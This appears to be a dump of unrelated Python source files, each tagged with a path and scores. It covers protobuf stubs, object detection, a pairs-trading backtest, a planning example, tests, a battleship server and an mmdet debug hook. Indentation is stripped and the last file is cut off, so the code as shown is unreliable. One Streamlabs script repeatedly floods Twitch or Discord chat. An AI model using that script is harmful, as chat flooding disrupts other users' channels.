# @@protoc_insertion_point(class_scope:effects.RegisterResponse)
))
_sym_db.RegisterMessage(RegisterResponse)
RemoveRequest = _reflection.GeneratedProtocolMessageType('RemoveRequest', (_message.Message,), dict(
DESCRIPTOR = _REMOVEREQUEST,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.RemoveRequest)
))
_sym_db.RegisterMessage(RemoveRequest)
RemoveResponse = _reflection.GeneratedProtocolMessageType('RemoveResponse', (_message.Message,), dict(
DESCRIPTOR = _REMOVERESPONSE,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.RemoveResponse)
))
_sym_db.RegisterMessage(RemoveResponse)
UpdateRequest = _reflection.GeneratedProtocolMessageType('UpdateRequest', (_message.Message,), dict(
DESCRIPTOR = _UPDATEREQUEST,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.UpdateRequest)
))
_sym_db.RegisterMessage(UpdateRequest)
UpdateResponse = _reflection.GeneratedProtocolMessageType('UpdateResponse', (_message.Message,), dict(
DESCRIPTOR = _UPDATERESPONSE,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.UpdateResponse)
))
_sym_db.RegisterMessage(UpdateResponse)
ListRequest = _reflection.GeneratedProtocolMessageType('ListRequest', (_message.Message,), dict(
DESCRIPTOR = _LISTREQUEST,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.ListRequest)
))
_sym_db.RegisterMessage(ListRequest)
ListResponse = _reflection.GeneratedProtocolMessageType('ListResponse', (_message.Message,), dict(
DESCRIPTOR = _LISTRESPONSE,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.ListResponse)
))
_sym_db.RegisterMessage(ListResponse)
DebugClearServiceRequest = _reflection.GeneratedProtocolMessageType('DebugClearServiceRequest', (_message.Message,), dict(
DESCRIPTOR = _DEBUGCLEARSERVICEREQUEST,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.DebugClearServiceRequest)
))
_sym_db.RegisterMessage(DebugClearServiceRequest)
DebugClearServiceResponse = _reflection.GeneratedProtocolMessageType('DebugClearServiceResponse', (_message.Message,), dict(
DESCRIPTOR = _DEBUGCLEARSERVICERESPONSE,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.DebugClearServiceResponse)
))
_sym_db.RegisterMessage(DebugClearServiceResponse)
# @@protoc_insertion_point(module_scope) | src/tt_protocol/tt_protocol/protocol/effects_pb2.py | 0.204978 | 0.17749 |
__all__ = ['RetinaNetModule', 'save_final']
# Cell
import json, os, requests, sys, tarfile
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
import numpy as np
import pickle
import random
from collections import defaultdict
from functools import reduce
from IPython.utils import io
from pathlib import Path
from PIL import Image
from PIL import ImageStat
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
from tqdm import tqdm
from typing import Hashable, List, Tuple, Union
# Cell
import albumentations as A
import torch, torchvision
import pytorch_lightning as pl
import torch.nn.functional as F
import torch.multiprocessing
from torch import nn
from torch.nn.modules import module
from torch import optim
from torch.utils.data import DataLoader, random_split
from torchvision.models.detection import RetinaNet, retinanet_resnet50_fpn
from .subcoco_utils import *
from .subcoco_lightning_utils import *
torch.multiprocessing.set_sharing_strategy('file_system')
print(f"Python ver {sys.version}, torch {torch.__version__}, torchvision {torchvision.__version__}, pytorch_lightning {pl.__version__}")
if is_notebook():
from nbdev.showdoc import *
# Cell
class RetinaNetModule(AbstractDetectorLightningModule):
def __init__(self, **kwargs):
AbstractDetectorLightningModule.__init__(self, **kwargs)
def create_model(self, backbone_name, num_classes=1, **kwargs):
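# Note: backbone_name is accepted but unused; retinanet_resnet50_fpn always builds a ResNet-50 FPN backbone.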
model = retinanet_resnet50_fpn(pretrained=False, num_classes=num_classes+1, pretrained_backbone=True)
# Hacked to avoid model builtin call to GeneralizedRCNNTransform.normalize() as done in augmentation
def noop_normalize(image): return image
# Hacked to avoid model builtin call to GeneralizedRCNNTransform.resize() as done in augmentation
def noop_resize(image, target): return image, target
# HACK!! IceVision does this too!
model.transform.normalize = noop_normalize
model.transform.resize = noop_resize
return model
def get_main_model(self): return self.model
def get_head(self): return self.model.head
def get_backbone(self): return self.model.backbone
# Cell
def save_final(retnet_model, model_save_path):
torch.save(retnet_model.model.state_dict(), model_save_path) | mcbbox/subcoco_retnet_lightning.py | 0.705075 | 0.181717 |
import numpy as np
import pandas as pd
from statsmodels.tsa.stattools import coint
import matplotlib.pyplot as plt
import seaborn
from pandas_datareader import data
# Set a seed value to make the experiment reproducible
np.random.seed(123)
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 1000)
symbolsIds = ['SPY','AAPL','ADBE','LUV','MSFT','SKYW','QCOM',
'HPQ','JNPR','AMD','IBM']
def load_financial_data(symbols, start_date, end_date,output_file):
try:
df = pd.read_pickle(output_file)
print('File data found...reading symbols data')
except FileNotFoundError:
print('File not found...downloading the symbols data')
df = data.DataReader(symbols, 'yahoo', start_date, end_date)
df.to_pickle(output_file)
return df
# Store the result under a new name so it does not shadow the pandas_datareader 'data' module used inside load_financial_data
financial_data = load_financial_data(symbolsIds, start_date='2001-01-01',
end_date='2018-01-01',
output_file='multi_data_large.pkl')
Symbol1_prices = financial_data['Adj Close']['MSFT']
Symbol1_prices.plot(figsize=(15,7))
plt.show()
Symbol2_prices = financial_data['Adj Close']['JNPR']
Symbol2_prices.name = 'JNPR'
plt.title("MSFT and JNPR prices")
Symbol1_prices.plot()
Symbol2_prices.plot()
plt.legend()
plt.show()
def zscore(series):
return (series - series.mean()) / np.std(series)
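# Engle-Granger cointegration test: a small p-value suggests the two price series share a mean-reverting spread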
score, pvalue, _ = coint(Symbol1_prices, Symbol2_prices)
print(pvalue)
ratios = Symbol1_prices / Symbol2_prices
plt.title("Ration between Symbol 1 and Symbol 2 price")
ratios.plot()
plt.show()
#plt.axhline(ratios.mean())
#plt.legend([' Ratio'])
zscore(ratios).plot()
plt.title("Z-score evolution")
plt.axhline(zscore(ratios).mean(),color="black")
plt.axhline(1.0, color="red")
plt.axhline(-1.0, color="green")
plt.show()
ratios.plot()
buy = ratios.copy()
sell = ratios.copy()
buy[zscore(ratios)>-1] = 0
sell[zscore(ratios)<1] = 0
buy.plot(color="g", linestyle="None", marker="^")
sell.plot(color="r", linestyle="None", marker="v")
x1,x2,y1,y2 = plt.axis()
plt.axis((x1,x2,ratios.min(),ratios.max()))
plt.legend(["Ratio", "Buy Signal", "Sell Signal"])
plt.show()
symbol1_buy=Symbol1_prices.copy()
symbol1_sell=Symbol1_prices.copy()
symbol2_buy=Symbol2_prices.copy()
symbol2_sell=Symbol2_prices.copy()
Symbol1_prices.plot()
symbol1_buy[zscore(ratios)>-1] = 0
symbol1_sell[zscore(ratios)<1] = 0
symbol1_buy.plot(color="g", linestyle="None", marker="^")
symbol1_sell.plot(color="r", linestyle="None", marker="v")
pair_correlation_trading_strategy = pd.DataFrame(index=Symbol1_prices.index)
pair_correlation_trading_strategy['symbol1_price']=Symbol1_prices
pair_correlation_trading_strategy['symbol1_buy']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['symbol1_sell']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['symbol2_buy']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['symbol2_sell']=np.zeros(len(Symbol1_prices))
position=0
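# Long/short state machine: position 0 = flat, 1 = long symbol1 / short symbol2, -1 = the reverse.
# Entries trigger on the z-score signals and the opposite legs close the pair. Chained indexing like
# df['col'][i] = v still works here but may raise SettingWithCopyWarning on recent pandas;
# df.loc[df.index[i], 'col'] = v is the safer form.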
for i in range(len(Symbol1_prices)):
s1price=Symbol1_prices[i]
s2price=Symbol2_prices[i]
if not position and symbol1_buy[i]!=0:
pair_correlation_trading_strategy['symbol1_buy'][i]=s1price
pair_correlation_trading_strategy['symbol2_sell'][i] = s2price
position=1
elif not position and symbol1_sell[i]!=0:
pair_correlation_trading_strategy['symbol1_sell'][i] = s1price
pair_correlation_trading_strategy['symbol2_buy'][i] = s2price
position = -1
elif position==-1 and (symbol1_sell[i]==0 or i==len(Symbol1_prices)-1):
pair_correlation_trading_strategy['symbol1_buy'][i] = s1price
pair_correlation_trading_strategy['symbol2_sell'][i] = s2price
position = 0
elif position==1 and (symbol1_buy[i] == 0 or i==len(Symbol1_prices)-1):
pair_correlation_trading_strategy['symbol1_sell'][i] = s1price
pair_correlation_trading_strategy['symbol2_buy'][i] = s2price
position = 0
Symbol2_prices.plot()
symbol2_buy[zscore(ratios)<1] = 0
symbol2_sell[zscore(ratios)>-1] = 0
symbol2_buy.plot(color="g", linestyle="None", marker="^")
symbol2_sell.plot(color="r", linestyle="None", marker="v")
x1,x2,y1,y2 = plt.axis()
plt.axis((x1,x2,Symbol1_prices.min(),Symbol2_prices.max()))
plt.legend(["Symbol1", "Buy Signal", "Sell Signal","Symbol2"])
plt.show()
Symbol1_prices.plot()
pair_correlation_trading_strategy['symbol1_buy'].plot(color="g", linestyle="None", marker="^")
pair_correlation_trading_strategy['symbol1_sell'].plot(color="r", linestyle="None", marker="v")
Symbol2_prices.plot()
pair_correlation_trading_strategy['symbol2_buy'].plot(color="g", linestyle="None", marker="^")
pair_correlation_trading_strategy['symbol2_sell'].plot(color="r", linestyle="None", marker="v")
x1,x2,y1,y2 = plt.axis()
plt.axis((x1,x2,Symbol1_prices.min(),Symbol2_prices.max()))
plt.legend(["Symbol1", "Buy Signal", "Sell Signal","Symbol2"])
plt.show()
pair_correlation_trading_strategy['symbol1_buy'].head()
pair_correlation_trading_strategy['symbol1_position']=\
pair_correlation_trading_strategy['symbol1_buy']-pair_correlation_trading_strategy['symbol1_sell']
pair_correlation_trading_strategy['symbol2_position']=\
pair_correlation_trading_strategy['symbol2_buy']-pair_correlation_trading_strategy['symbol2_sell']
pair_correlation_trading_strategy['symbol1_position'].cumsum().plot()
pair_correlation_trading_strategy['symbol2_position'].cumsum().plot()
pair_correlation_trading_strategy['total_position']=\
pair_correlation_trading_strategy['symbol1_position']+pair_correlation_trading_strategy['symbol2_position']
pair_correlation_trading_strategy['total_position'].cumsum().plot()
plt.title("Symbol 1 and Symbol 2 positions")
plt.legend()
plt.show()
pair_correlation_trading_strategy['symbol1_price']=Symbol1_prices
pair_correlation_trading_strategy['symbol1_buy']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['symbol1_sell']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['symbol2_buy']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['symbol2_sell']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['delta']=np.zeros(len(Symbol1_prices))
position=0
s1_shares = 1000000
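# Second pass in notional terms: size the symbol2 leg to match the symbol1
# dollar amount using whole shares only; 'delta' records the residual dollar
# mismatch left over by the integer-share rounding.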
for i in range(len(Symbol1_prices)):
s1positions= Symbol1_prices[i] * s1_shares
s2positions= Symbol2_prices[i] * int(s1positions/Symbol2_prices[i])
print(Symbol1_prices[i],Symbol2_prices[i])
delta_position=s1positions-s2positions
if not position and symbol1_buy[i]!=0:
pair_correlation_trading_strategy['symbol1_buy'][i]=s1positions
pair_correlation_trading_strategy['symbol2_sell'][i] = s2positions
pair_correlation_trading_strategy['delta'][i]=delta_position
position=1
elif not position and symbol1_sell[i]!=0:
pair_correlation_trading_strategy['symbol1_sell'][i] = s1positions
pair_correlation_trading_strategy['symbol2_buy'][i] = s2positions
pair_correlation_trading_strategy['delta'][i] = delta_position
position = -1
elif position==-1 and (symbol1_sell[i]==0 or i==len(Symbol1_prices)-1):
pair_correlation_trading_strategy['symbol1_buy'][i] = s1positions
pair_correlation_trading_strategy['symbol2_sell'][i] = s2positions
position = 0
elif position==1 and (symbol1_buy[i] == 0 or i==len(Symbol1_prices)-1):
pair_correlation_trading_strategy['symbol1_sell'][i] = s1positions
pair_correlation_trading_strategy['symbol2_buy'][i] = s2positions
position = 0
pair_correlation_trading_strategy['symbol1_position']=\
pair_correlation_trading_strategy['symbol1_buy']-pair_correlation_trading_strategy['symbol1_sell']
pair_correlation_trading_strategy['symbol2_position']=\
pair_correlation_trading_strategy['symbol2_buy']-pair_correlation_trading_strategy['symbol2_sell']
pair_correlation_trading_strategy['symbol1_position'].cumsum().plot()
pair_correlation_trading_strategy['symbol2_position'].cumsum().plot()
pair_correlation_trading_strategy['total_position']=\
pair_correlation_trading_strategy['symbol1_position']+pair_correlation_trading_strategy['symbol2_position']
pair_correlation_trading_strategy['total_position'].cumsum().plot()
plt.title("Symbol 1 and Symbol 2 positions")
plt.legend()
plt.show()
pair_correlation_trading_strategy['delta'].plot()
plt.title("Delta Position")
plt.show() | Chapter4/ch4_pairs_correlation_real_symbol.py | 0.190573 | 0.519582 |
import gym
import numpy as np
from typing import Callable
from skdecide.hub.domain.gym import DeterministicGymDomain, GymWidthDomain, GymDiscreteActionDomain
from skdecide.hub.solver.riw import RIW
from skdecide.utils import rollout
ENV_NAME = 'CartPole-v0'
HORIZON = 200
class D(DeterministicGymDomain, GymWidthDomain, GymDiscreteActionDomain):
pass
class GymRIWDomain(D):
"""This class wraps a cost-based deterministic OpenAI Gym environment as a domain
    usable by a width-based planner.
!!! warning
Using this class requires OpenAI Gym to be installed.
"""
def __init__(self, gym_env: gym.Env,
set_state: Callable[[gym.Env, D.T_memory[D.T_state]], None] = None,
get_state: Callable[[gym.Env], D.T_memory[D.T_state]] = None,
continuous_feature_fidelity: int = 1,
discretization_factor: int = 10,
branching_factor: int = None,
max_depth: int = 50) -> None:
"""Initialize GymRIWDomain.
# Parameters
gym_env: The deterministic Gym environment (gym.env) to wrap.
set_state: Function to call to set the state of the gym environment.
If None, default behavior is to deepcopy the environment when changing state
get_state: Function to call to get the state of the gym environment.
If None, default behavior is to deepcopy the environment when changing state
continuous_feature_fidelity: Number of integers to represent a continuous feature
in the interval-based feature abstraction (higher is more precise)
discretization_factor: Number of discretized action variable values per continuous action variable
branching_factor: if not None, sample branching_factor actions from the resulting list of discretized actions
max_depth: maximum depth of states to explore from the initial state
"""
DeterministicGymDomain.__init__(self,
gym_env=gym_env,
set_state=set_state,
get_state=get_state)
GymDiscreteActionDomain.__init__(self,
discretization_factor=discretization_factor,
branching_factor=branching_factor)
GymWidthDomain.__init__(self, continuous_feature_fidelity=continuous_feature_fidelity)
gym_env._max_episode_steps = max_depth
domain_factory = lambda: GymRIWDomain(gym_env=gym.make(ENV_NAME),
continuous_feature_fidelity=5,
discretization_factor=3,
max_depth=HORIZON)
domain = domain_factory()
domain.reset()
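# RIW (Rollout-IW) is a width-based planner: the state_features callback
# (bee2_features, provided by GymWidthDomain) maps the continuous Gym
# observation to the discrete feature vector its novelty test prunes on.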
if RIW.check_domain(domain):
solver_factory = lambda: RIW(domain_factory=domain_factory,
state_features=lambda d, s: d.bee2_features(s),
use_state_feature_hash=False,
use_simulation_domain=True,
time_budget=200,
rollout_budget=1000,
max_depth=200,
exploration=0.25,
parallel=False,
debug_logs=False)
with solver_factory() as solver:
GymRIWDomain.solve_with(solver, domain_factory)
initial_state = solver._domain.reset()
rollout(domain, solver, from_memory=initial_state, num_episodes=1, max_steps=HORIZON-1, max_framerate=30,
        outcome_formatter=lambda o: f'{o.observation} - cost: {o.value.cost:.2f}') | examples/riw_gym_solver.py | 0.932615 | 0.487063 |
import os
import pytest
import shutil
from flexmock import flexmock
from pathlib import Path
from container_workflow_tool.cli import ImageRebuilder
class TestDistgit(object):
def setup_method(self):
self.component = 's2i-base'
self.ir = ImageRebuilder('Testing')
self.ir.set_config('default.yaml', release="rawhide")
# Partner BZ testing
self.ir.rebuild_reason = "Unit testing"
self.ir.disable_klist = True
self.ir.set_do_images([self.component])
self.ir._setup_brewapi()
@pytest.mark.distgit
def test_setup_distgit(self):
assert self.ir.distgit is None
self.ir._setup_distgit()
assert self.ir.distgit is not None
@pytest.mark.distgit
def test_pull_downstream(self):
tmp = Path(self.ir._get_tmp_workdir())
self.ir.pull_downstream()
cpath = tmp / self.component
assert cpath.is_dir()
dpath = cpath / 'Dockerfile'
assert dpath.is_file()
shutil.rmtree(tmp / self.component)
@pytest.mark.distgit
def test_pull_upstream(self):
self.ir.pull_upstream()
tmp = self.ir._get_tmp_workdir()
cpath = os.path.join(tmp, 's2i')
assert os.path.isdir(cpath)
dpath = os.path.join(cpath, 'base', 'Dockerfile')
assert os.path.isfile(dpath)
@pytest.mark.distgit
def test_distgit_changes(self):
self.ir.conf["from_tag"] = "test"
tmp = Path(self.ir._get_tmp_workdir())
self.ir.dist_git_changes()
dpath = tmp / self.component / 'Dockerfile'
assert os.path.isfile(dpath)
tag_found = False
with open(dpath) as f:
if ":test" in f.read():
tag_found = True
assert tag_found
shutil.rmtree(tmp / self.component)
@pytest.mark.distgit
def test_distgit_commit_msg(self):
msg = "Unit testing"
self.ir.set_commit_msg(msg)
assert self.ir.distgit.commit_msg == msg
@pytest.mark.distgit
def test_tag_dockerfile(self):
tmp = Path(self.ir._get_tmp_workdir())
self.ir.conf["from_tag"] = "test"
self.ir.dist_git_changes()
cpath = tmp / self.component
dpath = cpath / 'Dockerfile'
found_tag = False
with open(dpath) as f:
if ":test" in f.read():
found_tag = True
assert found_tag
        shutil.rmtree(tmp / self.component) | tests/test_distgit.py | 0.326057 | 0.246137 |
import database
import wst
from game.player import Player
from random import randint, choice
abc = 'ABCDEFGHJKLMNPQRSTUVWXYZ123456789'
class Round():
def __init__(self, game_type):
        self.type = game_type  # 1 - random matchmaking, 0 - private game joined by code
        self.players_list = []
        self.state = 0  # 0 - waiting for players, 1 - placing ships (2 - waiting for the second player to finish placing), 3 - in game, 4 - finished
self.turn_index = 0
self.shots = 0
self.code = None
if self.type == 0:
self.code = ''
for _ in range(6):
self.code += choice(abc)
async def add_player(self, user):
self.players_list.append(Player(user))
user.set_state(3)
if len(self.players_list) == 2:
await self.start()
else:
await wst.send(user.ws, {'type': 'state', 'data': 0})
async def finish_place(self, player, opponent):
if (self.state != 1 or player.get_placed() or player.board.count_ships()
or player.board.get_ships() != [4, 3, 2, 1]): return
player.placed = True
if opponent.get_placed(): # placing is complete
self.state = 3
self.turn_index = randint(0, 1)
for pl in self.players_list:
await wst.send(pl.user.ws, {'type': 'state', 'data': 3})
await wst.send_turn(self)
else:
await wst.send(player.user.ws, {'type': 'state', 'data': 2})
async def place(self, player, num, state):
if self.state != 1 or player.get_placed() or state not in (0, 1): return
await wst.send(player.user.ws, {"type": 'board', "my": 1, "data": player.board.place(num, state)})
await wst.send(player.user.ws, {'type': 'ships', 'data': player.board.get_ships()})
async def auto_place(self, player):
if self.state != 1 or player.get_placed(): return False
await wst.send(player.user.ws, {"type": 'board', "my": 1, "data": player.board.auto_place()})
await wst.send(player.user.ws, {'type': 'ships', 'data': [4, 3, 2, 1]})
async def shot(self, player, opponent, num):
if player != self.players_list[self.turn_index] or self.state != 3: return
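        # board.shot returns a (board_to_send, change_turn) pair for a valid
        # shot, or a falsy value when the cell cannot be shot at.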
shot_result = opponent.board.shot(num)
if not shot_result: return
self.shots += 1
send_brd, change_turn = shot_result
if change_turn:
if self.turn_index == 1: self.turn_index = 0
else: self.turn_index = 1
await wst.send(player.user.ws, {"type": 'board', "my": 0, "data": send_brd})
await wst.send(opponent.user.ws, {"type": 'board', "my": 1, "data": send_brd})
await wst.send_turn(self)
if opponent.board.count_all() == 0:
self.state = 4
database.game_log(self, opponent, player)
await wst.send(player.user.ws, {'type': 'end', 'data': 1})
await wst.send(opponent.user.ws, {'type': 'end', 'data': 0})
async def start(self):
self.state = 1
self.shots = 0
for player in self.players_list:
player.reset()
player.user.set_state(2)
await wst.send(player.user.ws, {'type': 'state', 'data': 1})
await wst.send(player.user.ws, {'type': 'top', 'data': database.get_top(player.user.get_nickname())})
for opp in self.players_list:
if opp != player:
await wst.send(opp.user.ws, {'type': 'op_nick', 'data': player.user.get_nickname()})
def get_turn(self):
return self.turn_index
def get_state(self):
return self.state
def get_players(self):
return self.players_list
def get_type(self):
return self.type
def get_code(self):
return self.code
def get_shots(self):
        return self.shots | server/game/round.py | 0.310904 | 0.271122 |
import codecs
import json
import os
import re
import sys
#---------------------------
# [Required] Script Information
#---------------------------
ScriptName = "Spam Parameter"
Website = "https://www.twitch.tv/EncryptedThoughts"
Description = "Parameter ($spam) to be used in custom commands that will duplicate and spam the input message to chat. See readme.txt for use instructions."
Creator = "EncryptedThoughts"
Version = "1.0.0.0"
#---------------------------
# Define Global Variables
#---------------------------
SettingsFile = os.path.join(os.path.dirname(__file__), "settings.json")
ReadMe = os.path.join(os.path.dirname(__file__), "README.txt")
#---------------------------------------
# Classes
#---------------------------------------
class Settings(object):
def __init__(self, SettingsFile=None):
if SettingsFile and os.path.isfile(SettingsFile):
with codecs.open(SettingsFile, encoding="utf-8-sig", mode="r") as f:
self.__dict__ = json.load(f, encoding="utf-8")
else:
self.EnableDebug = True
def Reload(self, jsondata):
self.__dict__ = json.loads(jsondata, encoding="utf-8")
return
def Save(self, SettingsFile):
try:
with codecs.open(SettingsFile, encoding="utf-8-sig", mode="w+") as f:
json.dump(self.__dict__, f, encoding="utf-8")
with codecs.open(SettingsFile.replace("json", "js"), encoding="utf-8-sig", mode="w+") as f:
f.write("var settings = {0};".format(json.dumps(self.__dict__, encoding='utf-8')))
        except Exception:
Parent.Log(ScriptName, "Failed to save settings to file.")
return
#---------------------------
# [Required] Initialize Data (Only called on load)
#---------------------------
def Init():
global ScriptSettings
ScriptSettings = Settings(SettingsFile)
ScriptSettings.Save(SettingsFile)
return
#---------------------------
# [Optional] Reload Settings (Called when a user clicks the Save Settings button in the Chatbot UI)
#---------------------------
def ReloadSettings(jsonData):
# Execute json reloading here
ScriptSettings.__dict__ = json.loads(jsonData)
ScriptSettings.Save(SettingsFile)
return
#---------------------------
# [Required] Execute Data / Process messages
#---------------------------
def Execute(data):
return
#---------------------------
# [Required] Tick method (Gets called during every iteration even when there is no incoming data)
#---------------------------
def Tick():
return
#---------------------------
# [Optional] Parse method (Allows you to create your own custom $parameters)
#---------------------------
def Parse(parseString, userid, username, targetid, targetname, message):
regex = "\$spam\(\s*(discord|stream)\s*,\s*[0-9]+\s*,\s*[0-9]+\s*,\s*(true|false)\s*,.*\)" # !spam(string,number,number,bool,string)
item = re.search(regex, parseString)
if item is None:
return parseString
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Oh boy! Spam parameter detected: " + item.group())
rawArguments = item.group().strip()[6:][:-1]
args = rawArguments.split(",")
chatType = args[0]
spamCount = int(args[1])
maxLength = int(args[2])
allowPartialMessage = args[3]
inputMessage = ""
#allow , in final parameter in case the message needs to contain one
currentArg = 4
while currentArg < len(args):
if currentArg > 4:
inputMessage += ","
inputMessage += args[currentArg]
currentArg += 1
if chatType == "stream" and maxLength > 400:
maxLength = 400
if chatType == "discord" and maxLength > 1795:
maxLength = 1795
spam = ""
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Vomits Info -> chatType: " + chatType + " spamCount: " + str(spamCount) + " maxLength: " + str(maxLength) + " allowPartialMessage: " + str(allowPartialMessage) + " inputMessage: " + inputMessage)
while len(spam) <= maxLength:
if allowPartialMessage == "false" and (len(spam) + len(inputMessage) + 1) > maxLength:
break
spam += " " + inputMessage
if len(spam) > maxLength:
        spam = spam[:maxLength]  # trim any overflow from the last appended copy
parseString = parseString.replace(item.group(), spam)
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Spam text generated, PROCEEDING TO SPAM! (evil laughter)")
count = 0
while count < spamCount:
send_message(spam, chatType)
count += 1
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Spamming completed... Back to the shadows I go...")
return
#---------------------------
# [Optional] Unload (Called when a user reloads their scripts or closes the bot / cleanup stuff)
#---------------------------
def Unload():
return
#---------------------------
# [Optional] ScriptToggled (Notifies you when a user disables your script or enables it)
#---------------------------
def ScriptToggled(state):
return
def send_message(message, chatType):
if chatType:
if chatType == "discord":
Parent.SendDiscordMessage(message)
else:
Parent.SendStreamMessage(message)
else:
Parent.SendStreamMessage(message)
def openreadme():
    os.startfile(ReadMe) | SpamParameter_StreamlabsSystem.py | 0.238284 | 0.104523 |
import os.path as osp
import torch
import mmcv
import cv2
from mmcv.runner.hooks import HOOKS, Hook
from mmcv.runner import master_only
from mmdet.core.utils import tensor2imgs
from mmdet.utils.det3d import box_np_ops
import numpy as np
def imshow_3d_det_bboxes(img,
corners,
labels,
scores=None,
class_names=None,
score_thr=0,
bbox_color='green',
text_color='green',
thickness=1,
font_scale=0.5,
show=True,
win_name='',
wait_time=0,
out_file=None):
"""Draw 3d bboxes and class labels (with scores) on an image.
Args:
img (str or ndarray): The image to be displayed.
corners (ndarray): Bounding boxes (with scores), shaped (n, 8, 2).
labels (ndarray): Labels of bboxes.
class_names (list[str]): Names of each classes.
score_thr (float): Minimum score of bboxes to be shown.
bbox_color (str or tuple or :obj:`Color`): Color of bbox lines.
text_color (str or tuple or :obj:`Color`): Color of texts.
thickness (int): Thickness of lines.
font_scale (float): Font scales of texts.
show (bool): Whether to show the image.
win_name (str): The window name.
wait_time (int): Value of waitKey param.
out_file (str or None): The filename to write the image.
"""
assert corners.ndim == 3
assert labels.ndim == 1
assert corners.shape[0] == labels.shape[0]
assert corners.shape[1] == 8
img = mmcv.imread(img)
if score_thr > 0:
assert scores is not None
assert scores.shape[0] == labels.shape[0]
bbox_color = mmcv.color_val(bbox_color)
text_color = mmcv.color_val(text_color)
for corner, label in zip(corners, labels):
corner = np.round(corner).astype(np.int32)
        # Pick a random color per box so adjacent boxes stay distinguishable
        bbox_color = [int(c) for c in np.random.choice(256, size=3)]
for i1, i2 in [(0, 1), (1, 2), (2, 3), (3, 0),
(4, 5), (5, 6), (6, 7), (7, 4), (4, 6), (5, 7),
(0, 4), (1, 5), (2, 6), (3, 7)]:
cv2.line(
img, tuple(corner[i1]), tuple(corner[i2]), bbox_color, thickness=thickness, lineType=cv2.LINE_AA)
label_text = class_names[
label] if class_names is not None else 'cls {}'.format(label)
cv2.putText(img, label_text, (corner[0, 0], corner[0, 1] - 2),
cv2.FONT_HERSHEY_COMPLEX, font_scale, text_color)
if show:
mmcv.imshow(img, win_name, wait_time)
if out_file is not None:
mmcv.imwrite(img, out_file)
@HOOKS.register_module
class DebugLoggerHook(Hook):
def __init__(self,
log_dir=None,
interval=10,
enable=False):
super(DebugLoggerHook, self).__init__()
self.log_dir = log_dir
self.enable = enable
@master_only
def after_train_iter(self, runner):
if not self.enable:
return
# draw images
data = runner.data_batch
data = {k: v.data[0] for k, v in data.items()} # data of GPU:0
# data = {k: v[0] for k, v in data.items()} # data of sample 0
# available keys:
# K, fL, gt_bboxes, gt_bboxes_ignore, gt_labels
# img_meta, left_img, right_img, t2to3, velo2cam2, velo2cam3
iter_idx = runner._iter
img_metas = data['img_meta']
left_img_tensor = data['left_img']
right_img_tensor = data['right_img']
gt_bboxes = data['gt_bboxes']
gt_bboxes_3d = data['gt_bboxes_3d']
intrinsics = data['K']
gt_bboxes_ignore = data['gt_bboxes_ignore']
left_imgs = tensor2imgs(
left_img_tensor, **img_metas[0]['img_norm_cfg'])
right_imgs = tensor2imgs(
right_img_tensor, **img_metas[0]['img_norm_cfg'])
mix_imgs = [(l * 0.65 + r * 0.35)
for l, r in zip(left_imgs, right_imgs)]
for idx in range(len(left_imgs)):
img_show = mix_imgs[idx].copy()
img_show_3d = mix_imgs[idx].copy()
bboxes = gt_bboxes[idx].detach().cpu().numpy()
bboxes_3d = gt_bboxes_3d[idx].detach().cpu().numpy()
K = intrinsics[idx].detach().cpu().numpy()
corners = box_np_ops.center_to_corner_box3d(
bboxes_3d[:, :3], bboxes_3d[:, 3:6], bboxes_3d[:, 6], origin=[0.5, 1.0, 0.5], axis=1)
bboxes_ignore = gt_bboxes_ignore[idx].detach().cpu().numpy()
labels = data['gt_labels'][idx].detach().cpu().numpy()
labels_ignore = np.array([0] * len(bboxes_ignore))
swap = img_metas[idx]['swap']
flip = img_metas[idx]['flip']
filename = img_metas[idx]['left_filename']
cv2.putText(img_show, "swap " + str(swap), (10, 10),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
cv2.putText(img_show, "flip " + str(flip), (10, 30),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
cv2.putText(img_show, filename, (10, 50),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
cv2.putText(img_show_3d, "swap " + str(swap), (10, 10),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
cv2.putText(img_show_3d, "flip " + str(flip), (10, 30),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
cv2.putText(img_show_3d, filename, (10, 50),
cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255))
mmcv.imshow_det_bboxes(
img_show,
bboxes,
labels,
class_names=['?', 'c', 'p', 'b'],
bbox_color='green',
score_thr=0.,
show=False)
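            # Pinhole projection: map the 3D box corners into the image with
            # the camera intrinsics K, then divide by depth.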
corners_2d = corners @ K.T
corners_2d = corners_2d[..., :2] / corners_2d[..., 2:3]
imshow_3d_det_bboxes(
img_show_3d,
corners_2d,
labels,
class_names=['?', 'c', 'p', 'b'],
bbox_color='green',
score_thr=0.,
show=False,
out_file=osp.join(self.log_dir, f'debug_{iter_idx:06d}_{idx:02d}_3d.jpg'))
mmcv.imshow_det_bboxes(
img_show,
bboxes_ignore,
labels_ignore,
class_names=['x'],
bbox_color='red',
score_thr=0.,
show=False,
out_file=osp.join(self.log_dir, f'debug_{iter_idx:06d}_{idx:02d}.jpg'))
print("saving debug img to ", self.log_dir,
